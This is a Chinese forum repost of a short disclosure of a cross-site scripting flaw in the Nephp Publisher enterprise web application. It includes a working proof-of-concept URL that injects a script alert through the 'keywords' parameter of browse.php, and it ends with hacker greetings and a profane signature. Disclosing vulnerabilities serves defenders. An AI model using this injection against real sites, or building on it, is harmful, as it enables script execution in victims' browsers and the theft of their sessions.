发新话题
打印

[转载]Nephp Publisher企业版跨站脚本攻击漏洞

[转载]Nephp Publisher企业版跨站脚本攻击漏洞

信息来源:www.shabgard.org

Home : http://www.nephp.com
Type : Validation
Description : Vulnerable to Cross Site Scripting (XSS) attacks.
-------------------------------------------------------------------------
example :

/nephp/browse.php?mod=find&keywords='%3E%3Cscript%3Ealert('test');%3C/script%3E


bl2k
Greetz : strcpy,Hergy,magic,mouse,Littlehacker ...
曾几何时,有人对我说:装B遭雷劈。我说:去你妈的。于是,这个人又对我说:如果再说脏话,上帝会惩罚你的。我说:我操上帝。结论:彪悍的人生不需要上帝。

TOP

发新话题